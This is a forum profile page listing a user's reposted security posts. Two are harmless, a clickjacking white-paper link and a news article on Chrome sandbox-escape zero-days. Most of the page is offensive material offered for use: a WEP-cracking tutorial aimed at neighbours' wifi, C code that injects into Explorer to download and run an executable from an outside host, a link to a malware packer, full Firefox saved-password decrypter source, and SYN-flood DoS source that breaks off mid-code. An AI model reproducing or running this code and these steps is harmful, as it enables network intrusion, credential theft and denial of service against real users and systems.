Nytro

Everything posted by Nytro

  1. Clickjacking Paper

     Paul Stone, a consultant at Context, has conducted research into Clickjacking and produced a white paper which was premiered at Black Hat 2010, in a talk of the same title – Next Generation Clickjacking.

     Clickjacking is a term first introduced by Jeremiah Grossman and Robert Hansen in 2008 to describe a technique whereby an attacker tricks a user into performing certain actions on a website by hiding clickable elements inside an invisible iframe. Although it has been two years since the concept was first introduced, most websites still have not implemented effective protection against clickjacking. In part, this may be because of the difficulty of visualising how the technique works in practice.

     Download: http://www.contextis.com/resources/white-papers/clickjacking/Context-Clickjacking_white_paper.pdf
  2. Two Zero Day Flaws Used To Bypass Google Chrome Security

     May 10, 2011 | 02:02 PM
     By Kelly Jackson Higgins, Dark Reading

     French researchers say they hacked their way out of browser's sandbox, bypassed DEP and ASLR

     Researchers at French firm VUPEN Security yesterday posted a video of a hack they say they executed using two zero-day vulnerabilities in Google's Chrome browser that successfully bypassed its sandbox and other security features. VUPEN, which withheld technical details of the bugs in its disclosure, had not disclosed the bugs or any details to Google as of this posting. The security firm provides details of vulnerabilities it discovers to its paying government customers.

     "We did not publicly disclose any technical details of the vulnerabilities for security reasons. We did not send the technical details of the vulnerabilities to Google, and Google did not ask us to provide these details," says Chaouki Bekrar, CEO and head of research at VUPEN.

     A Google spokesperson said in a statement that without any details on the hack, the company is unable to verify it. "We're unable to verify VUPEN's claims at this time as we have not received any details from them. Should any modifications become necessary, users will be automatically updated to the latest version of Chrome," the spokesperson said.

     Chrome's sandbox feature, which runs an application in a restricted environment to protect the system, as well as the use of ASLR and DEP, had made the browser relatively impenetrable to hackers. Adobe also uses Chrome's sandboxing technology, but VUPEN's Bekrar says Adobe's software is not vulnerable to the new hack.

     Bekrar says VUPEN employed two different bugs its researchers discovered: one that's exploited inside the sandbox, and one that's executed outside of it. "The first one results from a memory corruption leading to the execution of the first payload as low integrity level, inside the sandbox," he says. "A second payload is then used to exploit another vulnerability which allows the bypass of the sandbox and execution of the final payload with medium-integrity level, outside the sandbox."

     The exploit, demonstrated here using Chrome v11.0.696.65 on Microsoft Windows 7 SP1 (x64), with the user being lured to visit a malware-rigged web page, also bypasses Microsoft's Address Space Layout Randomization (ASLR) security function and Data Execution Prevention (DEP) attack mitigation feature, and works on all Windows systems including Windows 7 Service Pack (SP) 1, Windows Vista SP2, and Windows XP SP3, according to Bekrar.

     Microsoft's ASLR protects Windows from an exploit attempting to call a system function: it places code in random areas of memory that make it more difficult for an attacker to run malware on a machine. DEP prevents an exploit from directly injecting and executing code from sections of memory used for data.

     VUPEN Security early last year said it was able to bypass DEP on IE 8 and execute arbitrary code, and that it had sent its exploit code to Microsoft to examine. Other vendors have demonstrated DEP and ASLR bypass attacks: Core Security Technologies discovered a flaw in Microsoft's Virtual PC hypervisor that can be used by an attacker to cheat DEP and ASLR. And independent researcher Peter Vreugdenhil at CanSecWest 2010 waged a heap overflow attack on IE 8 and used a zero-day vulnerability he discovered in the browser to bypass Windows 7's built-in anti-exploit features, Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR).

     VUPEN's Bekrar says it took the researchers "many weeks" to find a way to bypass Chrome's sandbox. "Chrome has probably the most secure sandbox in the market, and it took us many weeks to find a way to bypass it," he says. "We have been looking into its whole attack surface and features to find a hole allowing the escape from the sandbox."

     Anup Ghosh, founder and chief scientist at Invincea, says it's no surprise that the sandbox was hacked. "We always knew from the very beginning, while an internal sandbox is a good idea, architecturally, you've still got a lot of residual attack space within the browser," Ghosh says. "It's always just been a question of when it would happen."

     And the hack highlights just how the sandbox—albeit an extra layer of security—is still just another piece of software that has vulnerabilities of its own, experts say. "Like other security features such as ASLR, sandboxes are very important as they make exploitation much harder and mitigate threats, however a sandbox is not unbreakable as it is itself a piece of software which can be affected by vulnerabilities," Bekrar says.

     Invincea's Ghosh says he expects the vulnerabilities to be exploited, initially by sophisticated attackers targeting specific organizations, and then eventually, by organized crime syndicates. "I have no doubt that this vulnerability will be exploited. The fact that they are not making it public makes it far more valuable," he says.

     Meanwhile, there are no ways for Chrome users to protect themselves from these types of attacks.

     Source: http://www.darkreading.com/advanced-threats/167901091/security/attacks-breaches/229403161/two-zero-day-flaws-used-to-bypass-google-chrome-security.html
  3. I forgot to mention the source; I've updated the first post.
  4. How To Crack WEP using Backtrack w/Pictures

     Author: Warlock

     This tutorial is strictly educational; neither I, nor leetcoders, is responsible for whatever trouble you may get into by using this method. Tinypic killed a couple of my images, I'm sure you can still manage to do it.

     Welcome to my tutorial. By the end of this tutorial, you should be able to have cracked your (or your nearby neighbors') WEP encrypted wifi.

     What you need:
       • Backtrack 3 or 4 (in this tutorial I used 3, since I had it laying around), which you can get here: Downloads
       • A computer with a compatible wireless card (if you have a newer computer, this will most likely work on your machine)
       • Patience

     Assuming you've already downloaded backtrack, and burned it using your favorite burning software, restart your computer with the backtrack disc, since it can be used as a livecd.

     First of all, before you do anything, navigate to the wireless assistant: Start > Internet > Wireless Assistant. If you do not see any networks, then this will not work for you.

     Open the konsole, which is here. Now type:

       airmon-ng

     It should show you your wireless card's info, like so. Now type:

       airmon-ng stop (your interface)

     It should show you this. Now type:

       ifconfig (your interface) down

     Then type:

       macchanger --mac 00:11:22:33:44:55 (your interface)

     This spoofs your mac address, so your victim cannot figure out who you are. Type:

       airodump-ng (your interface)

     This will open up a new konsole. Once you see the network you want to attack, press CTRL+C (this will stop your wireless card from searching for new networks). Open a new konsole and type:

       airodump-ng -c (channel) -w (file name) --bssid (bssid) (your interface)

     Like so; it will open up yet another konsole. Now let it run for a few minutes (until it reaches about 5000 or so packets; the more, the better the chance of cracking it). Go watch a video on youtube, or go on HF; any network activity will increase the amount of packets you pick up.

     Open another konsole and type:

       aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (your interface)

     Type:

       aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (your interface)

     Let it run for about 5 minutes, while it collects the packets. Then press CTRL+C. Now type:

       aircrack-ng -b (bssid) (filename-01.cap)

     You have found the WEP key, mine being 77838557744334834238286364 (without the colons). And you're done!

     ~Warlock

     Source: LeetCoders
  5. FWB++

     FWB++ example by r3l4x[] (FWB stands for Firewall Bypass)

       /* Coder:Anskya,r3l4x[] */
       #pragma comment(linker,"/SECTION:.text,EWR /IGNORE:4078 /FILEALIGN:0x200")
       #pragma comment(linker,"/OPT:NOWIN98 /BASE:0x13140000 /INCREMENTAL:NO")
       #pragma comment(linker,"/ENTRY:Entrypoint /MERGE:.rdata=.text /MERGE:.data=.text")
       #pragma comment(lib, "urlmon.lib")
       #include <windows.h>

       unsigned long inject (void *)
       {
           URLDownloadToFile(0, "htt://Www.Anskya.Net/Test.exe", "C:\\xx.exe", 0, 0);
           WinExec("C:\\xx.exe", SW_SHOW);
           ExitThread(0);
           return 0;
       }

       void Entrypoint()
       {
           DWORD Size;
           PBYTE module;
           HANDLE process;
           DWORD PID;
           LPVOID NewModule;
           module = (PBYTE)GetModuleHandle(0);
           Size = ((PIMAGE_NT_HEADERS)(module+((PIMAGE_DOS_HEADER)module)->e_lfanew))->OptionalHeader.SizeOfImage;
           GetWindowThreadProcessId(FindWindow("shell_traywnd", NULL), &PID);
           process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
           VirtualFreeEx(process, module, 0, MEM_RELEASE);
           NewModule = VirtualAllocEx(process, module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
           WriteProcessMemory(process, NewModule, module, Size, NULL)
           CreateRemoteThread(process, 0, 0, (unsigned long(__stdcall *)(void *))inject, module, 0, NULL);
       }

     Source: LeetCoders
  6. Morphine Packer (C++ version)

     Author: holyfather

     This is a C/asm port of the original Delphi code.

     Download: http://www.megaupload.com/?d=PU3FCSNN

     Source: http://leetcoders.org/showthread.php?t=167
  7. FF pass Decrypt

     Firefox Password Decrypter by KriPpLer

       //-----------------------------------------------------------------------
       ////////////////////////////////////////////////////////////
       // Description: Firefox Password Cache Decrypter
       // Versions: Firefox 1, 2, and 3
       // Author: KriPpLer
       // Language: C
       // Released: 9/9/2008
       // URL: http://www.krippler.com/
       ///////////////////////////////////////////////////////////
       // Credit: http://securityxploded.com/ (FF 2 Source)
       // Original Source: http://nagmatrix.50webs.com/download/Firepassword_src.zip
       ////////////////////////////////////////////////////////////
       //-----------------------------------------------------------------------
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
       #include <windows.h>
       #include <userenv.h>
       #pragma comment(lib,"userenv.lib")
       //-----------------------------------------------------------------------
       //Firefox internal SEC structures
       typedef enum SECItemType {
           siBuffer = 0,
           siClearDataBuffer = 1,
           siCipherDataBuffer = 2,
           siDERCertBuffer = 3,
           siEncodedCertBuffer = 4,
           siDERNameBuffer = 5,
           siEncodedNameBuffer = 6,
           siAsciiNameString = 7,
           siAsciiString = 8,
           siDEROID = 9,
           siUnsignedInteger = 10,
           siUTCTime = 11,
           siGeneralizedTime = 12
       };
       struct SECItem {
           SECItemType type;
           unsigned char *data;
           unsigned int len;
       };
       typedef enum SECStatus {
           SECWouldBlock = -2,
           SECFailure = -1,
           SECSuccess = 0
       };
       //-----------------------------------------------------------------------
       //Removes gecko-sdk dependency
       #define PRBool int
       #define PRUint32 unsigned int
       #define PR_TRUE 1
       #define PR_FALSE 0
       //Mozilla library names
       #define NSS_LIBRARY_NAME "nss3.dll"
       #define PLC_LIBRARY_NAME "plc4.dll"
       #define NSPR_LIBRARY_NAME "nspr4.dll"
       #define SQLITE_LIBRARY_NAME "sqlite3.dll"
       #define MOZCRT_LIBRARY_NAME "mozcrt19.dll"
       #define NSSU_LIBRARY_NAME "nssutil3.dll"
       #define NSSU_LIBRARY_NAME "nssutil3.dll"
       #define PLDS_LIBRARY_NAME "plds4.dll"
       #define SOFTN_LIBRARY_NAME "softokn3.dll"
       #define LOADLIBRARY(x) LoadLibrary(x)
       #define GETPROCADDRESS GetProcAddress
       #define FREELIBRARY FreeLibrary
       //-----------------------------------------------------------------------
       const int buflen = 10240;
       static char readbuf[buflen+1];
       static int last = 0;
       static int next = 0;
       typedef struct PK11SlotInfoStr PK11SlotInfo;
       // NSS Library functions
       typedef SECStatus (*NSS_Init) (const char *configdir);
       typedef SECStatus (*NSS_Shutdown) (void);
       typedef PK11SlotInfo * (*PK11_GetInternalKeySlot) (void);
       typedef void (*PK11_FreeSlot) (PK11SlotInfo *slot);
       typedef SECStatus (*PK11_CheckUserPassword) (PK11SlotInfo *slot,char *pw);
       typedef SECStatus (*PK11_Authenticate) (PK11SlotInfo *slot, PRBool loadCerts, void *wincx);
       typedef SECStatus (*PK11SDR_Decrypt) (SECItem *data, SECItem *result, void *cx);
       // PLC Library functions
       typedef char * (*PL_Base64Decode)( const char *src, PRUint32 srclen, char *dest);
       // Function declarations..
       void NSSUnload();
       int InitFFLibs(char *firefoxPath);
       int InitializeNSSLibrary(char *profilePath, char *password);
       int CheckMasterPassword(char *password);
       int DirectoryExists( char *path );
       void StrLwr(char *str);
       int OpenFile(char *filePath);
       void CloseFile();
       int ReadLine(char *buffer, int size);
       char *GetFFProfilePath();
       char *GetFFLibPath();
       char *GetFFVersion();
       char **Explode(char *StrIn,const char *Delimiter);
       char *Split(char *String,char Delimeter[],int Part);
       char *replace(char *str, const char *substr, const char *repstr);
       char ReadChar();
       char Vers[_MAX_PATH] = "";
       int version = 1;
       int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen);
       int Base64Decode(char *cryptData, char **decodeData, int *decodeLen);
       //-----------------------------------------------------------------------
       NSS_Init NSSInit = NULL;
       NSS_Shutdown NSSShutdown = NULL;
       PK11_GetInternalKeySlot PK11GetInternalKeySlot = NULL;
       PK11_CheckUserPassword PK11CheckUserPassword = NULL;
       PK11_FreeSlot PK11FreeSlot = NULL;
       PK11_Authenticate PK11Authenticate = NULL;
       PK11SDR_Decrypt PK11SDRDecrypt = NULL;
       PL_Base64Decode PLBase64Decode = NULL;
       int IsNSSInitialized = 0;
       HMODULE libnss = NULL;
       HMODULE libplc = NULL;
       HMODULE libtmp = NULL;
       FILE *signonFile = NULL;
       //-----------------------------------------------------------------------
       int OpenFile(char *filePath)
       {
           last = next = 0;
           signonFile = fopen(filePath, "r");
           if( signonFile == NULL )
           {
               return 0; //fail
           }
           return 1;
       }
       //-----------------------------------------------------------------------
       char ReadChar()
       {
           if (next >= last)
           {
               next = 0;
               last = fread(readbuf, 1, buflen, signonFile);
               if (last <= 0 )
               {
                   return 0;
               }
           }
           return (readbuf[next++]);
       }
       //-----------------------------------------------------------------------
       int ReadLine(char *buffer, int size)
       {
           unsigned int c;
           int strLength = 0, i=0;
           buffer[0] = 0;
           while(1)
           {
               c = ReadChar();
               // eof reached
               if ( c == 0 ) // || feof(file) )
                   return 0;
               if (c == '\n')
               {
                   buffer[strLength++] = 0;
                   break;
               }
               if (c != '\r')
               {
                   for(i=0; i < 4 && ( (c & 0xff) != 0 ) ; i++)
                   {
                       if( strLength >= size )
                       {
                           printf("\n Buffer is insufficient to store data");
                           return 0;
                       }
                       // Increase buffer capacity dynamically
                       buffer[strLength++] = (char)c;
                       c = c >> 8;
                   }
               }
           }
           return 1;
       }
       //-----------------------------------------------------------------------
       //Misc functions
       int DirectoryExists( char *path )
       {
           DWORD attr = GetFileAttributes(path);
           if( (attr < 0) || !(attr & FILE_ATTRIBUTE_DIRECTORY ) )
           {
               return 0;
           }
           return 1;
       }
       //-----------------------------------------------------------------------
       void StrLwr(char *str)
       {
           int n=strlen(str);
           for(int i=0; i<n; i++)
           {
               if( str[i] >=65 && str[i]<=90 )
                   str[i]+=32;
           }
       }
       //-----------------------------------------------------------------------
       //Loads specified firefox library with the given ffdir path as root
       HMODULE LoadLibrary(char *firefoxDir, char *libName)
       {
           char loadPath[4096]="";
           strcpy(loadPath, firefoxDir);
           strcat(loadPath, "/");
           strcat(loadPath, libName);
           libtmp = LOADLIBRARY(loadPath);
           if( !libtmp )
           {
               return 0; //Failed to load library
           }
           return libtmp;
       }
       //-----------------------------------------------------------------------
       int InitFFLibs(char *FFDir)
       {
           libnss = libplc = NULL;
           //Load all required dll's
           if( FFDir != NULL )
           {
               //Minor version check
               if(!LoadLibrary(FFDir, MOZCRT_LIBRARY_NAME)) //We are using version 2 or lower
               {
                   goto version2;
               }
               else
               {
                   if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
                   {
                       if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
                       {
                           if( LoadLibrary(FFDir, PLC_LIBRARY_NAME) )
                           {
                               if( LoadLibrary(FFDir, NSSU_LIBRARY_NAME) )
                               {
                                   if( LoadLibrary(FFDir, SQLITE_LIBRARY_NAME) )
                                   {
                                   }
                               }
                           }
                       }
                   }
               }
       version2:
               if( LoadLibrary(FFDir, NSPR_LIBRARY_NAME) )
               {
                   if( LoadLibrary(FFDir, PLDS_LIBRARY_NAME) )
                   {
                       if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
                       {
                           if((libplc=LoadLibrary(FFDir, PLC_LIBRARY_NAME)) )
                           {
                               if( LoadLibrary(FFDir, SOFTN_LIBRARY_NAME) )
                               {
                                   libnss=LoadLibrary(FFDir, NSS_LIBRARY_NAME);
                                   if(libnss )
                                       printf("\n\n Librarys loaded from master firefox path successfully");
                               }
                           }
                       }
                   }
               }
           }
           // Now load from current path.
           if( !libnss )
           {
               libnss =LOADLIBRARY(NSS_LIBRARY_NAME);
               libplc =LOADLIBRARY(PLC_LIBRARY_NAME);
               if( !libnss || !libplc )
               {
                   printf("\n\n Failed to load Firefox libraries %s & %s ", NSS_LIBRARY_NAME, PLC_LIBRARY_NAME);
                   return 0;
               }
           }
           else
           {
               printf("\n Firefox Libraries loaded successfully");
           }
           // Extract the required functions....
           NSSInit = (NSS_Init) GETPROCADDRESS(libnss, "NSS_Init");
           NSSShutdown = (NSS_Shutdown)GETPROCADDRESS(libnss, "NSS_Shutdown");
           PK11GetInternalKeySlot = (PK11_GetInternalKeySlot) GETPROCADDRESS(libnss, "PK11_GetInternalKeySlot");
           PK11FreeSlot = (PK11_FreeSlot) GETPROCADDRESS(libnss, "PK11_FreeSlot");
           PK11Authenticate = (PK11_Authenticate) GETPROCADDRESS(libnss, "PK11_Authenticate");
           PK11SDRDecrypt = (PK11SDR_Decrypt) GETPROCADDRESS(libnss, "PK11SDR_Decrypt");
           PK11CheckUserPassword = (PK11_CheckUserPassword ) GETPROCADDRESS(libnss, "PK11_CheckUserPassword");
           if( !NSSInit || !NSSShutdown || !PK11GetInternalKeySlot || !PK11Authenticate || !PK11SDRDecrypt || !PK11FreeSlot || !PK11CheckUserPassword)
           {
               printf("\n\n Failed to get function address from library %s ", NSS_LIBRARY_NAME);
               NSSUnload();
               return 0;
           }
           // Get the functions from PLC library
           PLBase64Decode = ( PL_Base64Decode ) GETPROCADDRESS(libplc, "PL_Base64Decode");
           if( !PLBase64Decode )
           {
               printf("\n\n Failed to get function address from library %s ", PLC_LIBRARY_NAME);
               NSSUnload();
               return 0;
           }
           else
           {
               printf("\n Firefox library initialized successfully");
           }
           return 1;
       }
       //-----------------------------------------------------------------------
       int InitializeNSSLibrary(char *profilePath)
       {
           IsNSSInitialized = 0;
           // Initialize the NSS library
           if( (*NSSInit) (profilePath) != SECSuccess )
           {
               printf("\n\n NSSLib Initialization failed");
               NSSUnload();
               return 0;
           }
           else
           {
               IsNSSInitialized = 1;
               printf("\n NSS library initiliazed successfully");
           }
           return 1;
       }
       //-----------------------------------------------------------------------
       void NSSUnload()
       {
           if( IsNSSInitialized && (NSSShutdown != NULL) )
               (*NSSShutdown)();
           if( libnss != NULL )
               FREELIBRARY(libnss); //Free nss library
           if( libplc != NULL )
               FREELIBRARY(libplc); //Free plc library
       }
       //-----------------------------------------------------------------------
       int DecryptStr(char *cryptData, char **clearData)
       {
           int decodeLen = 0;
           int finalLen = 0;
           char *decodeData = NULL;
           char *finalData = NULL;
           if( cryptData[0] != NULL )
           {
               if( (Base64Decode(cryptData, &decodeData, &decodeLen) == 0) || (decodeData == NULL) )
               {
                   return 0;
               }
               // Do the actual PK11 decryption
               if( (PK11Decrypt(decodeData, decodeLen, &finalData, &finalLen) == 0) || (finalData == NULL))
               {
                   return 0;
               }
               *clearData = (char*) malloc( finalLen + 1 );
               if( *clearData == NULL )
               {
                   printf("\n Insufficient memory");
                   return 0;
               }
               memcpy(*clearData, finalData, finalLen);
               *(*clearData + finalLen) = 0; // Null terminate string
               return 1;
           }
           if( Base64Decode(cryptData, clearData, &decodeLen) == 0 )
           {
               return 0;
           }
           return 1;
       }
       //-----------------------------------------------------------------------
       int Base64Decode(char *cryptData, char **decodeData, int *decodeLen)
       {
           int len = strlen( cryptData );
           int adjust = 0;
           if (cryptData[len-1] == '=')
           {
               adjust++;
               if (cryptData[len-2] == '=')
                   adjust++;
           }
           *decodeData = ( char *)(*PLBase64Decode)(cryptData, len, NULL);
           if( *decodeData == NULL )
           {
               return 0;
           }
           *decodeLen = (len*3)/4 - adjust;
           return 1;
       }
       //-----------------------------------------------------------------------
       int PK11Decrypt(char *decodeData, int decodeLen, char **clearData, int *finalLen)
       {
           PK11SlotInfo *slot = 0;
           SECStatus status;
           SECItem request;
           SECItem reply;
           // Find token with SDR key
           slot = (*PK11GetInternalKeySlot)();
           if (!slot)
           {
               return 0;
           }
           // Decrypt the string
           request.data = (unsigned char *)decodeData;
           request.len = decodeLen;
           reply.data = 0;
           reply.len = 0;
           status = (*PK11SDRDecrypt)(&request, &reply, NULL);
           if (status != SECSuccess)
           {
               return 0;
           }
           *clearData = (char*)reply.data;
           *finalLen = reply.len;
           // Free the slot
           (*PK11FreeSlot)(slot);
           return 1;
       }
       //-----------------------------------------------------------------------
       int DumpCache(char *profilePath,char *signonFile)
       {
           char buffer[10240];
           char sbuffer[10240];
           char name[10240];
           char *clearData = NULL;
           int bufferLength = 10240;
           int count = 0;
           int ret;
           if( profilePath == NULL || signonFile == NULL)
           {
               return 0;
           }
           strcpy(sbuffer,profilePath);
           strcat(sbuffer,"\\");
           strcat(sbuffer,signonFile);
           if(OpenFile(sbuffer) == 0 ) // Open the signon file
           {
               printf("\n\n Failed to open signon file: [%s], skipped. ", signonFile);
               return 0;
           }
           else
           {
               printf("\n\n ============================================================== ");
               printf("\n = %s = ",signonFile);
               printf("\n ============================================================== ");
               /*/////////////////////////////////////////
                   Begin cache dump
               *//////////////////////////////////////////
               printf("\n\n ======================= Unmanaged URLS ======================= ");
               // Read out the unmanaged ("Never remember" URL list
               ReadLine(buffer, bufferLength); //Skip first line as its a useless version tag
               while (ReadLine(buffer, bufferLength) != 0)
               {
                   // End of unmanaged list
                   if (strlen(buffer) != 0 && buffer[0] == '.' && buffer[0] != '#')
                       break;
                   printf("\n %s ", buffer);
               }
               printf("\n ======================== Managed URLS ========================\n");
               // read the URL line
               while (ReadLine(buffer, bufferLength) != 0 ){
                   printf("\n URL: %s ", buffer);
                   //Start looping through final singon*.txt file
                   while (ReadLine(buffer, bufferLength) != 0 )
                   {
                       if (buffer[0] == '.')
                       {
                           printf("\n ==============================================================\n");
                           break; // end of cache entry
                       }
                       //Check if its a password
                       if (buffer[0] == '*')
                       {
                           strcpy(name,&buffer[1]);
                           ret = ReadLine(buffer, bufferLength);
                       }
                       else
                       {
                           printf("\n");
                           strcpy(name, buffer);
                           ret = ReadLine(buffer, bufferLength);
                       }
                       if( DecryptStr(buffer, &clearData) == 1 )
                       {
                           printf("\n %s: %s ", name, clearData);
                           clearData = NULL;
                       }
                   }
               }
               printf("\n\n ============================================================== ");
               printf("\n = END %s = ",signonFile);
               printf("\n ============================================================== \n");
               return 1;
           }
           /*/////////////////////////////////////////
               End pcache dump
           *//////////////////////////////////////////
       }
       //-----------------------------------------------------------------------
       // Find firefox path / libraries
       char *GetFFLibPath()
       {
           char regSubKey[] = "SOFTWARE\\Clients\\StartMenuInternet\\firefox.exe\\shell\\open\\command";
           char path[_MAX_PATH] ="";
           char *FFDir = NULL;
           DWORD pathSize = _MAX_PATH;
           DWORD valueType;
           HKEY rkey;
           // Open firefox registry key
           if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
           {
               printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
               return NULL;
           }
           // Read the firefox path
           if( RegQueryValueEx(rkey, NULL, 0, &valueType, (unsigned char*)&path, &pathSize) != ERROR_SUCCESS )
           {
               printf("\n Failed to read the firefox path value from registry ");
               RegCloseKey(rkey);
               return NULL;
           }
           if( pathSize <= 0 || path[0] == 0)
           {
               printf("\n Unable to locate firefox installation path");
               RegCloseKey(rkey);
               return NULL;
           }
           RegCloseKey(rkey);
           // Remove extra quotes
           if( path[0] == '\"' )
           {
               for(int i=0; i < strlen(path)-1 ; i++)
                   path[i] = path[i+1];
           }
           printf("\n Firefox main exe: %s", path);
           // Terminate the string at last "\\"
           for(int j=strlen(path)-1; j>0; j--)
           {
               if( path[j] == '\\' )
               {
                   path[j]=0;
                   break;
               }
           }
           FFDir = (char*) malloc( strlen(path) + 1);
           if(FFDir)
               strcpy(FFDir, path);
           printf("\n Firefox path: %s", FFDir);
           return FFDir;
       }
       //-----------------------------------------------------------------------
       char *GetFFProfilePath()
       {
           char profilePath[_MAX_PATH] = "";
           char partialPath[] = "Application Data\\Mozilla\\Firefox";
           char profileFile[_MAX_PATH];
           char line[1024];
           DWORD pathSize = _MAX_PATH;
           char *finalProfilePath = NULL;
           int isDefaultFound = 0;
           HANDLE token;
           // Get current user's profile directory
           if( OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &token) == FALSE )
           {
               printf("\n Failed to get current process token ");
               return NULL;
           }
           if( GetUserProfileDirectory(token, profilePath, &pathSize) == FALSE )
           {
               printf("\n Failed to get user profile directory");
               return NULL;
           }
           printf("\n User Profile directory: %s\n", profilePath);
           // Get firefox profile directory
           strcpy(profileFile, profilePath);
           strcat(profileFile,"\\");
           strcat(profileFile,partialPath);
           strcat(profileFile,"\\profiles.ini");
           // Open the firefox profile setting file
           FILE *profile = fopen(profileFile, "r");
           if( profile == NULL )
           {
               printf("\n Unable to find firefox profile file: %s ", profileFile);
               return NULL;
           }
           // This indicates that we are looking under default profile
           while(fgets(line, 1024, profile))
           {
               StrLwr(line);
               if( !isDefaultFound && ( strstr(line, "name=default") != NULL) )
               {
                   isDefaultFound = 1;
                   continue;
               }
               // Found default profile / check for path
               if( isDefaultFound )
               {
                   if( strstr(line,"path=") != NULL)
                   {
                       char *slash = strstr(line,"/");
                       if( slash != NULL )
                           *slash = '\\';
                       // remove \n from the end of line
                       line[strlen(line)-1] = 0;
                       char *start = strstr(line,"=");
                       int totalLen = strlen(profilePath) + strlen(partialPath) + strlen(start) + 3 ;
                       finalProfilePath = (char *) malloc(totalLen);
                       if( finalProfilePath )
                       {
                           strcpy(finalProfilePath,profilePath);
                           strcat(finalProfilePath,"\\");
                           strcat(finalProfilePath,partialPath);
                           strcat(finalProfilePath,"\\");
                           strcat(finalProfilePath,start+1);
                           printf("\n Final profile path: %s \n", finalProfilePath);
                       }
                       break;
                   }
               }
           }
           fclose(profile);
           return finalProfilePath;
       }
       //-----------------------------------------------------------------------
       char *GetFFVersion()
       {
           char regSubKey[] = "SOFTWARE\\Mozilla\\Mozilla Firefox";
           char *FFVers = NULL;
           DWORD pathSize = _MAX_PATH;
           DWORD valueType;
           HKEY rkey;
           // Open firefox registry key
           if( RegOpenKeyEx(HKEY_LOCAL_MACHINE, regSubKey, 0, KEY_READ, &rkey) != ERROR_SUCCESS )
           {
               printf("\n Failed to open the firefox registry key : HKCU\\%s", regSubKey );
               return NULL;
           }
           // Read the firefox path value
           if( RegQueryValueEx(rkey, "CurrentVersion", 0, &valueType, (unsigned char*)&Vers, &pathSize) != ERROR_SUCCESS )
           {
               printf("\n Failed to read the firefox version from registry ");
               RegCloseKey(rkey);
               return NULL;
           }
           if( pathSize <= 0 || Vers[0] == 0)
           {
               printf("\n Path value read from the registry is empty");
               RegCloseKey(rkey);
               return NULL;
           }
           RegCloseKey(rkey);
           FFVers = (char*) malloc( strlen(Vers) + 1);
           if( FFVers )
               strcpy(Vers,FFVers);
           if (FFVers[1] == '1')
           {
               version = 1;
           }else{
               if (FFVers[1] == '2')
               {
                   version = 2;
               }else{
                   if (FFVers[1] == '3')
                   {
                       version = 3;
                   }
               }
           }
           printf("\n Firefox version: %d", version);
           return (FFVers);
       }
       //-----------------------------------------------------------------------
       int main(int argc, char* argv[])
       {
           char *ProfilePath = NULL; //Profile path
           char *FFDir = NULL; //Firefox main installation path
           char buff[1024];
           ProfilePath = GetFFProfilePath();
           if( !DirectoryExists(ProfilePath))
           {
               printf("\n\n Firefox profile directory does not exist or no profiles found. \n");
               return 0;
           }
           FFDir = GetFFLibPath();
           if( !DirectoryExists(ProfilePath))
           {
               printf("\n\n Firefox installation path does not exist or is not installed. \n");
               return 0;
           }
           if( InitFFLibs(FFDir) )
           {
               if( InitializeNSSLibrary(ProfilePath) )
               {
                   //Take 3 Mozilla dumps
                   DumpCache(ProfilePath,"signons.txt");
                   DumpCache(ProfilePath,"signons2.txt");
                   DumpCache(ProfilePath,"signons3.txt");
                   //DumpCache(ProfilePath,"signons.sqlite");
                   //Dont forget to flush :/
                   NSSUnload();
               }
           }
           printf("\n ======================= End Cache Dump =======================\n");
           while(1){
               Sleep(10000); //Just loop until user exits
           }
       }
       //-----------------------------------------------------------------------

     Source: LeetCoders
  8. [GNU Linux C] SYN Flooder source

     Author: jakash3 (cred)

     C source code for Linux for sending multiple SYN flagged tcp/ip packets with spoofed source addresses to spawn half-open fake connections with tcp hosts. A form of DoS attack using ipv4 addressing that may still work against hosts without syn cookies enabled. Using raw tcp ipv4 sockets, it sends packets in the form of an IP header and an appended TCP header with no initial data. Checksum for IP header is calculated for the IP header only, while checksum for TCP header is calculated for the TCP pseudo-header concatenated with the actual TCP header and data.

     synflood.c

       #include "tcpip.h"
       #include <stdio.h>
       #include <stdlib.h>
       #include <string.h>
       #include <time.h>
       #include <signal.h>
       #include <errno.h>

       ushort csum(short* data, int len);
       char* randip(char* dst);
       ushort rand16();
       uint rand32();

       int sd;

       void help() {
           printf("SYN flooder - by Jakash3\nArguments: IPV4_ADDR PORT\n");
           exit(1);
       }

       void quit(int sig) {
           close(sd);
           exit(0);
       }

       int main(int argc, char** argv) {
           if (argc!=3) help();

           /* Map CTRL-C to quit() */
           struct sigaction sa;
           sa.sa_handler = &quit;
           sa.sa_flags = 0;
           sigemptyset(&sa.sa_mask);
           sigaction(SIGINT, &sa, 0);

           char rip[16];
           char packet[4096];
           struct iphdr ip;
           struct tcpph tph;
           struct tcphdr tcp;
           struct sockaddr_in sin;
           const int on = 1;

           memset(&packet, 0, 40);

           ip.ihl = 5;
           ip.ipv = 4;
           ip.tos = 0;
           ip.len = IPHDR_LEN + TCPHDR_LEN;
           ip.id = htons(rand16());
           ip.ttl = 64;
           ip.proto = IPPROTO_TCP;
           ip.src = (uint)inet_addr(randip(rip));
           ip.dst = (uint)inet_addr(argv[1]);
           ip.chksum = 0;
           ip.chksum = csum((short*)&ip, IPHDR_LEN);

           tcp.sport = htons((short)atoi(argv[2]));
           tcp.dport = htons((short)atoi(argv[2]));
           tcp.seq = htonl(rand32());
           tcp.offset = sizeof(struct tcphdr) / 4;
           tcp.flgs = TCP_SYN;
           tcp.chksum = 0;

           tph.src = ip.src;
           tph.dst = ip.dst;
           tph.zero = 0;
           tph.proto = IPPROTO_TCP;
           tph.tcp_len = sizeof(struct tcphdr);

           memmove(packet, &tph, TCPPH_LEN);
           memmove(packet + TCPPH_LEN, &tcp, TCPHDR_LEN);
           tcp.chksum = csum((short*)packet, TCPPH_LEN + TCPHDR_LEN);
